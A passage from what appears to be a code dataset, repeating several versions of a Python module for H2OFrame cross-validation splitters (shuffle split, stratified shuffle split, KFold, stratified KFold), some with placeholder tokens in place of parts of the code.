indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n <function token>\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n <docstring token>\n <function token>\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n <function token>\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n <function token>\n\n\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n <docstring token>\n <function token>\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n 